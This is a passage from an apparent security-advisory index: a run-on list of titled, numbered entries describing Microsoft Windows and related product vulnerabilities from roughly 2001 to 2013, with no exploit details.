Lets Remote Users Execute Arbitrary Code [1027384] Microsoft Host Integration Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027383] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027381] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027380] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027114] Microsoft Windows Includes Some Invalid Certificates [1027043] Microsoft Windows Partition Manager Memory Allocation Error Lets Local Users Gain Elevated Privileges [1026905] Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026904] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026903] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026902] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026900] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026899] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026685] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026497] Microsoft Windows ClickOnce Feature Lets Remote Users Execute Arbitrary Code [1026271] Microsoft Windows TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1026167] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026103] Microsoft Windows SSL/TLS Protocol Flaw Lets Remote Users Decryption Sessions [1026041] Microsoft Windows Components DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026037] Microsoft Windows Internet Name Service (WINS) Input Validation Flaw in ECommEndDlg() Lets Local Users Gain Elevated Privileges [1025937] Microsoft Windows DHCPv6 Processing Flaw Lets Remote Denial of Service to RPC Services [1025760] Microsoft Windows Bluetooth Stack Memory Access Error Lets Remote Users Execute Arbitrary Code [1025643] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1025634] Microsoft Windows OLE Automation Underflow Lets Remote Users Execute Arbitrary Code [1025512] Microsoft Windows Internet Name Service Socket Send Exception Handling Bug Lets Remote Users Execute Arbitrary Code [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025312] Microsoft Windows Kernel Bug in AFD.sys Lets Local Users Deny Service [1025248] Microsoft Windows Includes Some Invalid Comodo Certificates [1024879] Microsoft Windows Internet Connection Signup Wizard May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024877] Microsoft Windows May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024874] Microsoft Windows Task Scheduler Lets Local Users Gain Elevated Privileges [1024441] Microsoft Windows RPC Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1024312] Microsoft Windows Tracing Feature for Services Lets Local Users Gain Elevated Privileges [1024216] Microsoft Windows Shell LNK Shortcut Processing Flaw Lets Users Execute Arbitrary Code [1023571] Microsoft Windows Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023566] Microsoft Windows Kerberos Ticket-Granting-Ticket Processing Flaw Lets Remote Authenticated Users Deny Service [1023495] Microsoft Internet Explorer and Windows OS Shell Handler URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1022710] Microsoft Windows Internet Name Service (WINS) Buffer Overflows Let Remote Users Execute Arbitrary Code [1022330] Microsoft Windows Bug in SETDESKWALLPAPER and GETDESKWALLPAPER Calls Let Local Users Deny Service [1022047] Microsoft Windows SearchPath Function May Let Remote Users Execute Arbitrary Code [1022044] Microsoft Windows Privilege Separation and Access Control Bugs Let Local Users Gain Elevated Privileges [1021629] Microsoft Windows Guidelines for Disabling AutoRun are Ineffective and May Permit Code Execution [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1020678] Microsoft Windows IPSec Policy May Not Be Enforced in Certain Cases [1020677] Microsoft Windows Event System Bugs Let Remote Authenticated Users Execute Arbitrary Code [1020446] Microsoft Windows AutoRun Bug May Let Users Execute Arbitrary Code [1020006] Microsoft Windows XP 'i2omgmt.sys' Input Validation Flaw Lets Local Users Gain Elevated Privileges [1019165] Microsoft Windows LSASS Lets Local Users Gain Elevated Privileges [1018942] Microsoft Windows DNS Service Insufficent Entropy Lets Remote Users Spoof the DNS Service [1018831] Microsoft Windows ShellExecute() URI Handler Bug Lets Remote Users Execute Arbitrary Commands [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1017901] Microsoft Windows Help File Heap Overflow Lets Remote Users Execute Arbitrary Code [1017827] Microsoft Windows Animated Cursor Bug Lets Remote Users Execute Arbitrary Code [1017736] Microsoft Windows Explorer OLE Parsing Bug Lets Users Deny Service [1017641] Microsoft Windows RichEdit OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017636] Microsoft Windows Defender Integer Overflow in Parsing PDF Files Lets Remote Users Execute Arbitrary Code [1017441] Microsoft Windows Workstation Service Memory Allocation Error in NetrWkstaUserEnum() Lets Remote Users Deny Service [1017369] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Book Files Let Remote Users Execute Arbitrary Code [1017168] Microsoft Windows Kernel GDI Data Structure Processing Bug Lets Local Users Gain Elevated Privileges [1016941] Microsoft Windows Shell Integer Overflow Lets Remote Users Execute Arbitrary Code [1016388] Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications [1016339] Microsoft Windows 'hlink.dll' Buffer Overflow in Processing Hyperlinks Lets Remote Users Execute Arbitrary Code [1016292] Microsoft Windows Buffer Overflow in AOL ART Image Rendering Library Lets Remote Users Execute Arbitrary Code [1016290] Microsoft Windows Buffer Overflow in TCP/IP Stack Lets Remote Users Execute Arbitrary Code [1016286] Microsoft Windows 98 Graphics Rendering Engine Buffer Overflow in Processing WMF Images Lets Remote Users Execute Arbitrary Code [1015898] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Books Lets Remote Users Execute Arbitrary Code [1015897] Microsoft Windows Explorer COM Object Bug Lets Remote Users Execute Arbitrary Code [1015765] Microsoft Windows Services Have Unsafe Default ACLs That Let Remote Authenticated Users Gain Elevated Privileges [1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1015629] Microsoft Windows IGMP Processing Bug Lets Remote Users Deny Service [1015595] Microsoft Windows UPnP/NetBT/SCardSvr/SSDP Services May Be Incorrectly Configured By 3rd Party Applications, Allowing Local Users to Gain Elevated Privileges [1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015453] Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code [1015416] Microsoft Windows Unspecified WMF Rendering Bug Lets Remote Users Execute Arbitrary Code [1015349] Microsoft Windows Internet Explorer May Let Remote Users Obfuscate the Download Dialog Box [1015347] Microsoft Windows 2000 Kernel APC Queue Bug Lets Local Users Gain Elevated Privileges [1015233] Microsoft Windows RPC Service May Let Remote Users Deny Service [1015168] Microsoft Windows Buffer Overflows in Graphics Rendering Engine Lets Remote Users Execute Arbitrary Code [1015049] Microsoft Internet Explorer Drag-and-Drop Timing May Let Remote Users Install Arbitrary Files [1015044] Microsoft Windows Multiple COM Objects Let Remote Users Execute Arbitrary Code [1015042] Microsoft Windows Plug and Play Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Lets Remote Users Execute Arbitrary Code [1015039] Microsoft Windows Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015037] Microsoft Windows Buffer Overflows in MSDTC and COM+ Let Remote Users Execute Arbitrary Code and Local User Gain Elevated Privileges [1015036] Microsoft Windows FTP Client Input Validation Hole Lets Remote Servers Create/Overwrite Files on the Target User's System [1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules [1014642] Microsoft Windows Kerberos and PKINIT Vulnerabilities Allow Denial of Service, Information Disclosure, and Spoofing [1014640] Microsoft Windows Plug and Play Stack Overflow Lets Remote Users Execute Arbitrary Code [1014639] Microsoft Windows Telephony Service Remote Code Execution or Local Privilege Escalation [1014638] Microsoft Windows Print Spooler Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014498] Microsoft Windows Remote Desktop Protocol Bug Lets Remote Users Deny Service [1014417] Microsoft Windows Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users [1014198] Microsoft Windows Buffer Overflow in Processing Server Message Block Packets Lets Remote Users Execute Arbitrary Code [1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code [1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code [1013689] Microsoft Windows Shell MSHTA Lets Remote Users Code Execute Arbitrary Scripting Code [1013688] Microsoft Windows Kernel and Font Buffer Overflows Let Local Users Deny Service or Obtain System Privileges [1013686] Microsoft Windows TCP, IP, and ICMP Processing Errors Let Remote Users Deny Service and Execute Arbitrary Code [1013552] Microsoft Windows Remote Desktop 'TSShutdn.exe' Lets Remote Authenticated Users Shutdown the System [1013284] Microsoft Windows 2000 and XP Group Policy Can Be Bypassed By Microsoft Office Applications and By Flash Drives [1013120] Microsoft Windows OLE Buffer Overflow Lets Remote Users Execute Arbitrary Code and COM Access Flaw Lets Remote Authenticated Users Gain Elevated Privileges [1013119] Microsoft Windows Hyperlink Object Library Lets Remote Users Execute Arbitrary Code [1013117] Microsoft Windows License Logging Service Lets Remote Users Execute Arbitrary Code [1013115] Microsoft Windows Media Player Buffer Overflow in Processing PNG Files Lets Remote Users Execute Arbitrary Code [1013114] Microsoft Windows SMB Lets Remote Users Execute Arbitrary Code [1013112] Microsoft Windows XP Named Pipe Validation Error Lets Remote Users Obtain Information [1012891] Microsoft IE Windows XP SP2 File Download Security Can Be Bypassed With Dynamic IFRAME Tag [1012684] Microsoft Windows LoadImage API Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012683] Microsoft Windows ANI File Parsing Errors Let Remote Users Deny Service [1012682] Microsoft Windows Help System Buffer Overflows in Processing Phrase Compressed Help Files Lets Remote Users Execute Arbitrary Code [1012626] Microsoft Windows Media Player setItemInfo Lets Remote Users Execute Arbitrary Code [1012515] Microsoft Windows NT 4.0 Buffer Overflows in the Logging and Processing of DHCP Packets May Let Remote Users Execute Arbitrary Code [1012513] Microsoft Windows Kernel Buffer Overflow in Processing Local Procedure Call Messages Lets Local Users Gain System Privileges [1012458] Microsoft Internet Explorer Lets Remote Users Inject Content into Open Windows [1012435] Microsoft Windows Resource Kit Buffer Overflow and Input Validation Holes in 'w3who.dll' May Permit Remote Code Execution and Cross-Site Scripting Attacks [1011940] Microsoft Remote Desktop on Windows XP Lets Remote Authenticated Users Restart the System [1011880] Microsoft Windows XP Error in Explorer in Processing WAV Files Lets Remote Users Deny Service [1011859] Microsoft Internet Explorer on Windows XP Fails to Restrict Drag and Drop Operations When Configured to Disable These Operations [1011647] Microsoft Windows Shell Buffer Overflows Let Remote Users Execute Arbitrary Code [1011637] Microsoft Windows Buffer Overflow in Processing Compressed Folders Lets Remote Users Execute Arbitrary Code [1010996] Microsoft Windows XP SP2 Local Computer Scripting Restrictions Can Be Bypassed With a Specially Crafted MHT File [1010959] Microsoft Windows Explorer (in XP SP2) May Fail to Warn Users When Executing Untrusted Files [1010688] Microsoft Windows Task Scheduler Buffer Overflow Lets Remote Users Execute Arbitrary Code [1010687] Microsoft Windows 2000/NT POSIX Subsystem Buffer Overflow Lets Local Users Gain Elevated Privileges [1010352] Microsoft Windows 2000 Domains With Eight Characters May Let Remote Users With Expired Passwords Login [1010314] Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users [1009940] Microsoft Windows Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009776] Microsoft Windows Kernel Local Descriptor Table Flaw Lets Local Users Gain Elevated Privileges [1009771] Microsoft Windows Negotiate Security Software Provider (SSP) Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code [1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1009762] Microsoft Windows COM Internet Services and RPC over HTTP Can Be Crashed By Remote Users [1009761] Microsoft Windows COM Object Identifier Creation Flaw May Let Remote Users Cause Applications to Open Network Ports [1009758] Microsoft Windows RCP Memory Leak Lets Remote Users Deny Service [1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service [1009359] Microsoft Windows Media Services Can Be Crashed By Remote Users [1009181] Microsoft Windows Explorer Heap Overflow in Processing '.emf' Files Permits Code Execution [1009008] Microsoft Windows Internet Naming Service (WINS) Length Validation Flaw Lets Remote Users Deny Service [1008699] Microsoft Windows Buffer Overflow in MDAC Lets Remote Users Execute Arbitrary Code [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1008146] Microsoft Windows Workstation Service (wkssvc.dll) Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Privileges [1007933] Microsoft Windows Messenger Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With Local System Privileges [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007922] Microsoft Windows RPC Multi-threaded Race Condition Lets Remote Users Crash the Service or Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1007874] Microsoft Windows OS PostThreadMessage() API Permits Local Users to Terminate Processes That Have Message Queues [1007670] Microsoft Windows Remote Procedure Call (RPC) DCOM Activation Buffer Overflows Let Remote Users Execute Arbitrary Code [1007615] Microsoft Windows NetBIOS Name Service May Disclose Memory Contents to Remote Users [1007281] Microsoft Windows NT File Management Flaw May Let Remote Users Crash Certain Applications [1007214] Microsoft Windows XP Shell Buffer Overflow in Processing Folder Display Attributes Permits Remote Code Execution [1007212] Microsoft Windows Remote Procedure Call (RPC) Service Buffer Overflow in Processing DCOM Requests Allows Remote Code Execution [1007152] Microsoft Windows 2000 Accessibility Utility Manager Lets Local Users Gain Elevated Privileges [1007099] Microsoft Windows 2000 ShellExecute() Buffer Overflow May Let Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1007059] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Has Another Buffer Overflow That Lets Remote Execute Arbitrary Code [1007057] Microsoft Windows Media Player Access Control Flaw Lets Remote Users View, Modify, and Delete Media Library Metadata [1006959] Microsoft Windows Server 2003 Drivers May Leak Information From Memory Via Ethernet Packets Containing TCP Streams [1006866] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Lets Remote Execute Arbitrary Code [1006803] Microsoft Windows Can Be Crashed By Remote Users via Malformed NetMeeting URLs [1006588] Microsoft Windows OS Kernel Messaging Buffer Overflow Lets Local Users Gain Full Control of the System [1006580] Microsoft Windows 2003 'win2k.sys' Printing Bug Lets Users Crash the System [1006532] Microsoft Windows VM Input Validation Flaw in ByteCode Verifier Lets Malicious Java Applets Execute Arbitrary Code [1006447] Microsoft Windows Terminal Services RDP Implementation Does Not Validate Server Identity, Allowing Man-in-the-Middle Attacks [1006323] Microsoft Windows Buffer Overflow in Windows Script Engine JScript.DLL Lets Remote Users Execute Arbitrary Code [1006286] Microsoft Windows 2000/XP PostMessage() API Flaw May Let Local Users Grab Passwords from Local Dialog Boxes [1006179] Microsoft Windows Me Help and Support Center URL Handler Overflow Lets Remote Users Execute Arbitrary Code [1006121] Microsoft Windows 'riched20.DLL' Buffer Overflow May Let Remote Users Crash Applications [1006045] Microsoft Windows XP Redirector Buffer Overflow May Let Local Users Gain System Level Privileges [1005986] Microsoft Windows Terminal Server MSGINA.DLL Flaw Lets Remote Authenticated Users Reboot the Server [1005859] Microsoft Windows File Protection Mechanism Weakness in Trusting Code-Signing Certificate Chains Lets Arbitrary Remote Users Sign Code That Will Be Trusted By Windows [1005858] Microsoft Windows File Protection Weakness May Let Local Users Replace Code With Previous Vulnerable Versions Without Detection [1005833] Microsoft Windows XP Shell Buffer Overflow in Processing Audio Files Allows Remote Users to Execute Arbitrary Code [1005799] Microsoft Windows OS Bug in Processing WM_TIMER Messages May Let Local Users Gain Elevated Privileges [1005761] Microsoft Windows XP Wireless LAN Support May Disclose Access Point Information to Remote Users [1005455] Microsoft Windows Remote Procedure Call (RPC) Service Null Pointer Dereference Allows Remote Users to Crash the Service [1005454] Microsoft Windows Media Player for Solaris Uses Unsafe Default Permissions [1005343] Microsoft Windows Help System Bug in Processing Compiled HTML Help Files Lets Remote Users Execute Arbitrary Commands in the Local Computer Security Zone [1005336] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Files to Be Created [1005335] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Code to Be Executed [1005332] Microsoft Windows Help System Buffer Overflow in 'hhctrl.ocx' Lets Remote Users Execute Arbitrary Code [1005256] (Vendor Issues Fix) Microsoft Windows XP Remote Desktop Implementation Bug Lets Remote Users Crash the Operating System [1005242] Microsoft Windows XP Remote Desktop Can Be Crashed By Remote Users Sending a Modified RDP Packet [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1005108] Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them [1005070] Microsoft Internet Explorer (IE) Browser Error Message Processing Allows Remote Users to Execute Arbitrary Code on Certain Windows 98 Platforms [1005068] Microsoft NTFS Filesystem in Windows NT and Windows 2000 Has Auditing Hole That Lets Local Users Access Files Without the File Access Being Audited [1005063] Microsoft Windows XP Help and Support Center Hole Lets Remote Users Create URLs That, When Loaded, Will Delete Arbitrary Files on Your System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004357] Microsoft Windows Debugging Facility for Windows NT4 and 2000 Has Authentication Hole That Lets Local Users Execute Arbitrary Code with SYSTEM Privileges [1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition [1004083] Microsoft Windows 2000 'microsoft-ds' Service Flaw Allows Remote Users to Create Denial of Service Conditions By Sending Malformed Packets [1004022] Microsoft Windows 2000 Group Policy Object Enforcement Can Be Circumvented if User License Limits are Exceeded [1003975] Microsoft Windows NT, 2000, and XP Kernel Buffer Overflow in Processing Multiple UNC Provider (MUP) Requests May Let Local Users Obtain System Level Privileges [1003949] Microsoft Windows 2000 DCOM Implementation Flaw May Disclose Memory Contents to Remote Users [1003816] Microsoft Windows 2000 Automatic Log Off Policy Fails to Expire Sessions in Progress [1003764] Microsoft Windows Operating System Shell URL Handler Bug Lets Remote Users Create HTML That Could Cause Arbitrary Code to Be Executed on Another User's System in Certain Situations [1003687] Microsoft Windows 2000 and Windows XP SMTP Service Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003686] Microsoft Windows SMTP Service Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003633] Microsoft XML Core Services in Microsoft Windows XP Operating System Lets Remote Scripts Access and Send Local Files [1003591] Microsoft Windows Terminal Services May Cause the System's Screen Saver Lockout Mechanism to Fail in Certain Situations [1003472] Microsoft Telnet Server for Windows 2000 and for Interix Has a Buffer Overflow That May Let Remote Users Execute Code on the Server with System Level Privileges [1003402] Microsoft Windows NT 4.0 and Windows 2000 Domain Controllers May Give Elevated Privileges to Remote Users Who Are Valid Administrators on Other Trusted Domains [1003369] PGPfire Personal Firewall for Microsoft Windows Discloses Identifying Information to Remote Users [1003310] Microsoft Windows NT/2000 Authentication Lockout Bug May Record Successful Logins as Failed Login Attempts in Certain Situations [1003308] Microsoft Windows XP Manifest Processing Bug Lets Local Users Corrupt the System and Cause the Boot Process to Fail [1003257] Microsoft Windows XP Upgrade Effectively Removes Patches from Internet Explorer (IE) During Upgrade, Leaving Users Exposed to IE Vulnerabilities [1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC [1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users [1003221] Microsoft Internet Explorer (IE) Default Configuration Allows HTML-based Scripts to Access Your Windows Clipboard Contents [1003201] Microsoft Windows 95 Backup Utility Has Buffer Overflow That Could Cause Denial of Service Conditions [1003121] Microsoft Windows XP Task Manager Will Not Kill Certain Processes [1003041] Microsoft Windows XP Remote Desktop Client May Disclose Recently Used Account Names to Remote Users [1003028] Microsoft Windows Universal Plug and Play Component Buffer Overflow Gives Remote Users System Level Access to Windows XP and 98/ME Hosts [1003003] Microsoft Windows XP Hot Key Function Lets Physically Local Users Execute Administrator Hot Key Functions in Certain Situations [1002979] Microsoft Windows Explorer Discloses Stored FTP Passwords to Local Users [1002926] Microsoft Windows Operating System File Locking Design May Allow Local Users to Block Group Policy Scripts [1002922] Microsoft Windows 2000 Internet Key Exchange (IKE) Service Can Be Crashed By Remote Users [1002754] Terminal Services on Microsoft Windows 2000 and XP Allow Remote Users to Log Bogus IP Addresses Instead of the User's Genuine Address [1002731] Microsoft Windows 2000 RunAs Service May Disclose Authentication Credentials to Local Users [1002730] Microsoft Windows 2000 RunAs Utility May Disclose Sensitive Information to Local Users [1002729] Microsoft Windows 2000 RunAs Service Allows Local Users to Disable the Service [1002601] Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users [1002519] TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users [1002418] Counterpane's Password Safe Password Encryption Utility for Microsoft Windows May Disclose Passwords to Local Users in Certain Situations [1002394] Microsoft Windows NT Remote Procedure Call (RPC) Services Can Be Crashed With Malformed Packets [1002201] Microsoft Windows TCP/IP Stack Vulnerable to a Certain Man-in-the-Middle Denial of Service Attack [1002197] Microsoft Windows NNTP Network News Service Has a Memory Leak That Allows Remote Users to Cause the Server to Crash [1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program [1002106] Microsoft Windows 2000 and Windows NT 4.0 RPC Input Validation Failure Lets Remote Users Destabilize the Operating System [1002099] Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users [1002098] Windows Terminal Services in Microsoft Windows 2000 and NT 4.0 Can Be Crashed By Remote Users Due to a Memory Leak [1001993] Microsoft Windows 2000, Linux 2.4, NetBSD, FreeBSD, and OpenBSD May Let Remote Users Affect TCP Performance [1001992] Microsoft Windows NT Lets Remote Users Cause Increased Packet Overhead and Increased CPU Resource Consumption [1001931] Microsoft Windows 2000 SMTP Service May Allow Unauthorized Remote Users to Relay E-mail via the Service [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL [1001701] Microsoft Windows 2000 Telnet Server Allows Local Users to Gain System-Level Privileges and Lets Remote Users Crash the Server [1001605] Microsoft Windows 2000 Allows Local Users to Elevate Privileges [1001603] Microsoft Windows Media Player May Allow Remote Users to Execute Code Contained in Internet Shortcuts and View Files on the Media Player's Host [1001587] Microsoft Word for Windows and for Mac May Run Macros Linked By RTF Documents Without Warning [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001513] Microsoft Windows 2000 Indexing Service Allows Remote Users to View Include Programming Files [1001501] Microsoft Windows 2000 Domain Controllers Can Be Effectively Halted By Remote Users [1001467] Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System [1001464] Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server [1001360] Microsoft Windows Operating System DLL May Allow Malicious Remote Scripts to Run Code on the User's Host Without the User's Intervention [1001240] Microsoft FTP Client for Windows 2000 Still Vulnerable to Executing Arbitrary Code in Limited Situations [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords [1001110] A Microsoft German-Language Hotfix for Windows NT 4 Incorrectly Displays Some Security Events as Other Security Events [1028910] Windows TCP/IP Stack ICMPv6 Memory Allocation Flaw Lets Remote Users Deny Service [1028909] Windows NAT Driver ICMP Processing Flaw Lets Remote Users Deny Service [1028908] Microsoft Active Directory Federation Services Discloses Account Information to Remote Users [1028907] Windows Kernel Lets Local Users Gain Elevated Privileges and Bypass ALSR [1028906] Windows RPC Bug Lets Local Users Gain Elevated Privileges [1028905] (Microsoft Issues Fix for Exchange Server) Oracle Fusion Middleware Bugs Let Remote Users Deny Service and Access and Modify Data [1028904] (Microsoft Issues Fix for Exchange Server) Oracle PeopleSoft Products Bugs Let Remote Users Partially Access and Modify Data and Partially Deny Service [1028902] Microsoft Internet Explorer Multiple Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1028874] Windows Phone PEAP-MS-CHAPv2 Authentication Protocol Weakness May Let Remote Users Obtain Authentication Information [1028759] (Microsoft Issues Fix for Internet Explorer) Adobe Flash Player Buffer Overflows Let Remote Users Execute Arbitrary Code [1028756] Microsoft .NET Bug Lets Remote Users Execute Arbitrary Code and Bypass Security Restrictions [1028755] Microsoft Silverlight Null Pointer Dereference Lets Remote Users Execute Arbitrary Code [1028753] Windows Media Format Runtime Parsing Flaw in WMV Video Decoder Lets Remote Users Execute Arbitrary Code [1028752] Microsoft DirectShow GIF Image Processing Flaw Lets Remote Users Execute Arbitrary Code [1028751] Microsoft Office TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028750] Microsoft Visual Studio .NET TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028749] Microsoft Lync TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028746] Windows Kernel-Mode Drivers Bugs Let Local Users Gain Elevated Privileges and Remote Users Execute Arbitrary Code [1028745] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1028657] Windows Kernel Lets Local Users Obtain Information From Kernel Memory [1028656] Windows Print Spooler Memory Error Lets Local Users Gain Elevated Privileges [1028655] Windows TCP/IP Driver Bug Lets Remote Users Deny Service [1028651] Microsoft Internet Explorer Multiple Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1028650] Microsoft Office Buffer Overflow in PNG Image Processing Lets Remote Users Execute Arbitrary Code [1028591] Windows Kernel 'win32k.sys' Lets Local Users Gain Elevated Privileges [1028561] Windows Essentials URI Handling Flaw Discloses Potentially Sensitive Information to Remote Users [1028560] Microsoft Visio Discloses Information to Remote Users [1028558] Microsoft .NET Flaws Let Remote Users Bypass Authentication and Bypass XML File Signature Verification [1028557] Microsoft Malware Protection Engine Flaw Lets Remote Users Execute Arbitrary Code [1028554] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1028553] Microsoft Word RTF Shape Data Parsing Error Lets Remote Users Execute Arbitrary Code [1028552] Microsoft Publisher Multiple Bugs Let Remote Users Execute Arbitrary Code [1028551] Microsoft Lync Object Access Flaw Lets Remote Users Execute Arbitrary Code [1028550] Microsoft Office Communicator Object Access Flaw Lets Remote Users Execute Arbitrary Code [1028546] Windows HTTP Stack Header Processing Flaw Lets Remote Users Deny Service [1028545] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1028514] Microsoft Internet Explorer Object Access Bug Lets Remote Users Execute Arbitrary Code [1028412] Microsoft SharePoint Server Discloses Files to Remote Authenticated Users [1028411] Microsoft Office Web Apps Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028410] Microsoft InfoPath Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028409] Microsoft Groove Server Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028408] Microsoft SharePoint Input Validation Flaw in HTML Sanitization Component Permits Cross-Site Scripting Attacks [1028407] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1028405] Microsoft Active Directory LDAP Processing Flaw Lets Remote Users Deny Service [1028404] Microsoft Antimalware Client Path Name Flaw Lets Local Users Gain Elevated Privileges [1028403] Windows Kernel Race Conditions Let Local Users Gain Elevated Privileges [1028402] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges and Deny Service [1028398] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1028397] Windows Remote Desktop Bug in ActiveX Control Lets Remote Users Execute Arbitrary Code [1028394] NVIDIA Windows Driver Bugs Lets Local Users Gain Elevated Privileges [1028341] Windows Modern Mail Lets Remote Users Spoof URLs in Email Messages [1028281] Microsoft Office for Mac HTML Loading Bug Lets Remote Users Obtain Potentially Sensitive Information [1028279] Microsoft OneNote Buffer Validation Flaw Lets Remote Users Obtain Potentially Sensitive Information [1028278] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting and Denial of Service Attacks [1028276] Microsoft 